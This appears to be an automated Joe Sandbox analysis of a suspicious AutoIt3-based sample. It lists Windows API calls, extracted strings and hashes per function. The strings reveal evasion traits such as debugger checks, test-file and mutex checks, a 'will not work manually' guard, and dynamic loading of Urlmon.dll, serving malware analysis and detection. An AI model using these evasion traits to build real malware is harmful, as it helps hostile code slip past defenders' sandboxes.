                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                      • String ID:
                                      • API String ID: 1986165174-0
                                      • Opcode ID: a19537f1e5818bf19a2c49c9b9b1394dac888c5df28a2eb970bbda8e58d1e520
                                      • Instruction ID: 299624f8828803ec4e1f354804bc1c11808124c772ac6d5d2359f8c43a414e3b
                                      • Opcode Fuzzy Hash: a19537f1e5818bf19a2c49c9b9b1394dac888c5df28a2eb970bbda8e58d1e520
                                      • Instruction Fuzzy Hash: 2B91E331949BC4DECB31CB6894545EABFE9FF69301B880A5ED0C7C3A41D230A688C75A
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00801DD6
                                      • GetSysColor.USER32(0000000F), ref: 00801E2A
                                      • SetBkColor.GDI32(?,00000000), ref: 00801E3D
                                        • Part of subcall function 0080166C: DefDlgProcW.USER32(?,00000020,?), ref: 008016B4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ColorProc$LongWindow
                                      • String ID:
                                      • API String ID: 3744519093-0
                                      • Opcode ID: 4ce3da2762e866081002205d9c8465ba26fb608cccfe8c85c12b2bc50227e7cb
                                      • Instruction ID: 7a4e6e41f54e08e7c8204aa36131426eac8ee4844f228b0a5a313a430a8534e6
                                      • Opcode Fuzzy Hash: 4ce3da2762e866081002205d9c8465ba26fb608cccfe8c85c12b2bc50227e7cb
                                      • Instruction Fuzzy Hash: 0BA125B0105508BAEE68BB6D8C4DE7F359DFF82329F14411AFA02D61D2CB319D02D6B6
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00815FEF
                                        • Part of subcall function 0082359C: __lock.LIBCMT ref: 008235A2
                                        • Part of subcall function 0082359C: DecodePointer.KERNEL32(00000001,?,00816004,00858892), ref: 008235AE
                                        • Part of subcall function 0082359C: EncodePointer.KERNEL32(?,?,00816004,00858892), ref: 008235B9
                                        • Part of subcall function 00815F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00815F18
                                        • Part of subcall function 00815F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00815F2D
                                        • Part of subcall function 00815240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081526C
                                        • Part of subcall function 00815240: IsDebuggerPresent.KERNEL32 ref: 0081527E
                                        • Part of subcall function 00815240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 008152E6
                                        • Part of subcall function 00815240: SetCurrentDirectoryW.KERNEL32(?), ref: 00815366
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0081602F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                      • String ID:
                                      • API String ID: 1438897964-2740779761
                                      • Opcode ID: 531b1cf3ab5fb0addcd904136a4e0f0e77f22920e92548748ddcd522f232777b
                                      • Instruction ID: d7010665a0da3cd603e7a74db725a5f97c117ea14ae539c0cef4fad0c4549569
                                      • Opcode Fuzzy Hash: 531b1cf3ab5fb0addcd904136a4e0f0e77f22920e92548748ddcd522f232777b
                                      • Instruction Fuzzy Hash: E9116771908302DBC310EF69EC0594ABBF8FF98350F00491AF485D72A1DB709584CF96
                                      APIs
                                      • timeGetTime.WINMM ref: 0080BF57
                                        • Part of subcall function 008052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008052E6
                                      • Sleep.KERNEL32(0000000A,?,?), ref: 008436B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePeekSleepTimetime
                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                      • API String ID: 1792118007-922114024
                                      • Opcode ID: 3d00c51890a37a92a341a362dd47318d14c8511fc767ad8c03180e55f67644fe
                                      • Instruction ID: 3c35ad3a1895ecc554d7b767432fb1e4acfc6fa7b74d186e07ef0815632ffc62
                                      • Opcode Fuzzy Hash: 3d00c51890a37a92a341a362dd47318d14c8511fc767ad8c03180e55f67644fe
                                      • Instruction Fuzzy Hash: A2C29D70608745DFD768DF28C884BAAB7E5FF84304F14891DE58AD72A1DB71E984CB82

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 03CF47B8: Sleep.KERNEL32(00000002,00000000,03CF4829,?,00000001), ref: 03CF4809
                                      • Sleep.KERNEL32(000007D0,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03D21AD2
                                      • Sleep.KERNEL32(00000064,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03D21AD9
                                      • GetCurrentThreadId.KERNEL32 ref: 03D21E53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CurrentThread
                                      • String ID: 6.5.9$AHK$AU3$DLL$Yes$abby$autoit3.exe$c.txt$c:\debugg$c:\temp\just_test.txt$c:\temp\quick$c:\temp\test_ok$c:\tes2\$cc.txt$debug 0 $mutex0$mutex1$script.a3x$test$test.txt$u.txt$uu.txt$vbc.exe$xdebug 0
                                      • API String ID: 1849766040-4083824653
                                      • Opcode ID: 354d98dcdbad1533d39e75a9bb7a5d2ea41942eba16081f629d74fcc3d72aca5
                                      • Instruction ID: f60e06ab5985a1fa2d583260300246a616ba9e613bf1f7f57cbc140070889eb2
                                      • Opcode Fuzzy Hash: 354d98dcdbad1533d39e75a9bb7a5d2ea41942eba16081f629d74fcc3d72aca5
                                      • Instruction Fuzzy Hash: 3EF1633D6003588FCB61FBA8D880A9DBBB5AF65308F528491E604DF715CB31AD46EB61

                                      Control-flow Graph

                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00802C8C
                                      • GetSystemMetrics.USER32(00000007), ref: 00802C94
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00802CBF
                                      • GetSystemMetrics.USER32(00000008), ref: 00802CC7
                                      • GetSystemMetrics.USER32(00000004), ref: 00802CEC
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00802D09
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00802D19
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00802D4C
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00802D60
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00802D7E
                                      • GetStockObject.GDI32(00000011), ref: 00802D9A
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00802DA5
                                        • Part of subcall function 00802714: GetCursorPos.USER32(?), ref: 00802727
                                        • Part of subcall function 00802714: ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000001), ref: 00802769
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      • SetTimer.USER32(00000000,00000000,00000028,008013C7), ref: 00802DCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: 521b5e3a5aae353e398510809b7d585310a8184a445f97e32f51f1d0b4da8de7
                                      • Instruction ID: 2d1dbde945f6441e2004817e833e17b795d7f69436a2f49d6a4b13b8c40c5b44
                                      • Opcode Fuzzy Hash: 521b5e3a5aae353e398510809b7d585310a8184a445f97e32f51f1d0b4da8de7
                                      • Instruction Fuzzy Hash: A0B14B71A0020AAFDB54DFA8DC59BAE7BB4FB48314F104229FA15E72D0DB74A850CF95

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 008200CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00813094), ref: 008200ED
                                        • Part of subcall function 008208C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0081309F), ref: 008208E3
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008130E2
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008501BA
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008501FB
                                      • RegCloseKey.ADVAPI32(?), ref: 00850239
                                      • _wcscat.LIBCMT ref: 00850292
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$`
                                      • API String ID: 2673923337-2813422417
                                      • Opcode ID: 580f85859eadf8eb5868b40ee8ffb633d5e95541d386e5b0c55977e7cdc6807e
                                      • Instruction ID: 05cd38b30265ad47a695b2a75587322abc02148e2881a4cb36a2c645b73462db
                                      • Opcode Fuzzy Hash: 580f85859eadf8eb5868b40ee8ffb633d5e95541d386e5b0c55977e7cdc6807e
                                      • Instruction Fuzzy Hash: F67138715497119EC714EF69E889DABBBB8FF58340F40052EF555C32A1EF309988CB92

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00803444
                                      • RegisterClassExW.USER32(00000030), ref: 0080346E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080347F
                                      • InitCommonControlsEx.COMCTL32(?), ref: 0080349C
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008034AC
                                      • LoadIconW.USER32(000000A9), ref: 008034C2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008034D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 8814e9d76a3879153bf53fa93f9e00b15445cb02cfe0b7abcfe4c8881b46adf1
                                      • Instruction ID: 672edb765e45ca29ebb90bb05c055e0e1712c53d68d65dc7cf28109922e30f6d
                                      • Opcode Fuzzy Hash: 8814e9d76a3879153bf53fa93f9e00b15445cb02cfe0b7abcfe4c8881b46adf1
                                      • Instruction Fuzzy Hash: E93125B1844309AFDB40DFA4EC88BC9BBF0FB08320F14412AF691E62A0D7B50585CF94

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00803444
                                      • RegisterClassExW.USER32(00000030), ref: 0080346E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080347F
                                      • InitCommonControlsEx.COMCTL32(?), ref: 0080349C
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008034AC
                                      • LoadIconW.USER32(000000A9), ref: 008034C2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008034D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 2db225bf8ed8a29cabba163a12086dc227b7bf39437504085dd38b8d71626414
                                      • Instruction ID: 4a082616fd3c06e6b323552c3419c8221dc301a9d7da629d7715720504a73494
                                      • Opcode Fuzzy Hash: 2db225bf8ed8a29cabba163a12086dc227b7bf39437504085dd38b8d71626414
                                      • Instruction Fuzzy Hash: E121E3B1904218AFEB40AFE4EC89B9DBBF4FB08710F04411AFA21A62A0D7B21544CF95

Control-flow Graph

• Graph rendering not captured. Recoverable from the graph data: the function starts at 011D11A1 (blocks 011D11A1-011D1304), loops repeatedly over CharNextA, and calls a subroutine at 011D27D9.
                                      APIs
                                      • CharNextA.USER32(00000000), ref: 011D11F6
                                      • CharNextA.USER32(00000000,00000000), ref: 011D1202
                                      • CharNextA.USER32(00000000,00000000), ref: 011D122A
                                      • CharNextA.USER32(00000000), ref: 011D1236
                                      • CharNextA.USER32(?,00000000), ref: 011D1277
                                      • CharNextA.USER32(00000000,?,00000000), ref: 011D1283
                                      • CharNextA.USER32(00000000,?,00000000), ref: 011D12BB
                                      • CharNextA.USER32(?,00000000), ref: 011D12C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: $"$"
                                      • API String ID: 3213498283-938660540
                                      • Opcode ID: d316ed03cc4c61b4f1638d1c38ba63b0d80f02d362ec4b184a513fd5a617f086
                                      • Instruction ID: 4c7bfc9cfcb82e6a43f6422e0635338e2ddbdf7fcc5f492d2c9c522169c08256
                                      • Opcode Fuzzy Hash: d316ed03cc4c61b4f1638d1c38ba63b0d80f02d362ec4b184a513fd5a617f086
                                      • Instruction Fuzzy Hash: CF51F6B4A08282EFE329DFBCD484A16BBE5EF2A350B75084DE4C4CB342D335A840DB51

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00815156
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00815165
                                      • LoadIconW.USER32(00000063), ref: 0081517C
                                      • LoadIconW.USER32(000000A4), ref: 0081518E
                                      • LoadIconW.USER32(000000A2), ref: 008151A0
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008151C6
                                      • RegisterClassExW.USER32(?), ref: 0081521C
                                        • Part of subcall function 00803411: GetSysColorBrush.USER32(0000000F), ref: 00803444
                                        • Part of subcall function 00803411: RegisterClassExW.USER32(00000030), ref: 0080346E
                                        • Part of subcall function 00803411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080347F
                                        • Part of subcall function 00803411: InitCommonControlsEx.COMCTL32(?), ref: 0080349C
                                        • Part of subcall function 00803411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008034AC
                                        • Part of subcall function 00803411: LoadIconW.USER32(000000A9), ref: 008034C2
                                        • Part of subcall function 00803411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008034D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: e79885b54ccf30d3a3b2576485b74fd895f890d53bac69b59cba233ee53457e5
                                      • Instruction ID: e05f79029c4e34c7d849dd7997060e1db42f3d3cc68a53e2686b1c71b62edc5d
                                      • Opcode Fuzzy Hash: e79885b54ccf30d3a3b2576485b74fd895f890d53bac69b59cba233ee53457e5
                                      • Instruction Fuzzy Hash: 62215771D04308AFEB109FA9ED09F9D7BF5FB08321F00411AF605A62A0D7B65950CF84

Control-flow Graph

• Graph rendering not captured. Recoverable from the graph data: the function starts at 00814D83 and dispatches to blocks calling DefWindowProcW, PostQuitMessage, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow and SetFocus, with subroutine calls to 0080C460, 0080C483, 00862CCE, 00815AC3, 008034E4, 00815B29, 00815BD7, 00858854 and 008159D3.
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00814E22
                                      • KillTimer.USER32(?,00000001), ref: 00814E4C
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00814E6F
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00814E7A
                                      • CreatePopupMenu.USER32 ref: 00814E8E
                                      • PostQuitMessage.USER32(00000000), ref: 00814EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: b7ff7fa276fa3e293e8f018d20006d5adba7dec84c717d9ea411a8dc1387a17a
                                      • Instruction ID: 18c71f8737123e676f11f713a61c5e6ed03096089e74a9ae9a9f104ad7b566db
                                      • Opcode Fuzzy Hash: b7ff7fa276fa3e293e8f018d20006d5adba7dec84c717d9ea411a8dc1387a17a
                                      • Instruction Fuzzy Hash: 7F41EB31248209ABDB556F68AC49FFA36ADFF40321F041529FA02D11E1CB71ECD49F66

Control-flow Graph

• Graph rendering not captured. Recoverable from the graph data: a single basic block 03CF8AF4-03CF8B63 calling GetModuleHandleA and LoadLibraryA.
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,03D219A1,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03CF8AFF
                                      • LoadLibraryA.KERNELBASE(Urlmon.dll,?,03D219A1,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03CF8B2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleLibraryLoadModule
                                      • String ID: Advapi32.dll$LoadLibraryA$Shell32.dll$Urlmon.dll$kernel32.dll$ntdll.dll$user32.dll
                                      • API String ID: 4133054770-1140356178
                                      • Opcode ID: b6cc218b94c0b06744b07ad930702b9effb87d2109c1edabcb51cc58ca4b2072
                                      • Instruction ID: 3a6e4c96858f00ce465a69fe16a5195f8a997ac29532ebd065a01401db678b7f
                                      • Opcode Fuzzy Hash: b6cc218b94c0b06744b07ad930702b9effb87d2109c1edabcb51cc58ca4b2072
                                      • Instruction Fuzzy Hash: 3EF0B7F66467109FDBE0FFA598999283AF0FA756113004069F621C6319DF704411FF22
                                      APIs
                                      • MessageBoxA.USER32(00000000,Executing manually will not work,011D7E19,00000000), ref: 011D7BC9
                                      • MessageBoxA.USER32(00000000,011D7E41,011D7E19,00000000), ref: 011D7C41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Executing manually will not work$libeay32.dll$libssl32.dll$tdFBRmkc
                                      • API String ID: 2030045667-1446224538
                                      • Opcode ID: 5c59ccd4e269cb51248727b7889413f1cb88641dd6b82fb74b98e14dbd2df3d9
                                      • Instruction ID: 965c3d50095fcef4af1411c1ce917b490062e1cadcbb1636a537545bf2c77241
                                      • Opcode Fuzzy Hash: 5c59ccd4e269cb51248727b7889413f1cb88641dd6b82fb74b98e14dbd2df3d9
                                      • Instruction Fuzzy Hash: 64613C34A0620D9BCB1CEB94D591F9DB7B1FB9830CF5081A5E824A3388DB34ED45CB52
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00815109
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0081512A
                                      • ShowWindow.USER32(00000000), ref: 0081513E
                                      • ShowWindow.USER32(00000000), ref: 00815147
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: c88c28392eccf7dfb1872f1d4fe9fe93a880399a7094a12ae99d4dad39733bca
                                      • Instruction ID: 865621caf5c63f199614c96490750088dd8eb91154a74bbf3f68e3600b1a4c3b
                                      • Opcode Fuzzy Hash: c88c28392eccf7dfb1872f1d4fe9fe93a880399a7094a12ae99d4dad39733bca
                                      • Instruction Fuzzy Hash: CCF0F871645294BEEA312B67AC4CE373E7EF7C6F60F04411EBA01A22B0C6751851DEB0
                                      APIs
                                        • Part of subcall function 00814A8C: _fseek.LIBCMT ref: 00814AA4
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DE1
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DF4
                                      • _free.LIBCMT ref: 00869C5F
                                      • _free.LIBCMT ref: 00869C66
                                      • _free.LIBCMT ref: 00869CD1
                                        • Part of subcall function 00822F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822F99
                                        • Part of subcall function 00822F85: GetLastError.KERNEL32(00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822FAB
                                      • _free.LIBCMT ref: 00869CD9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID: >>>AUTOIT SCRIPT<<<
                                      • API String ID: 1552873950-2806939583
                                      • Opcode ID: 54e9caaeeea232c8f5b10cc8ae3c22ee1cfdecd395bbeddf28086b5de3fc6b3b
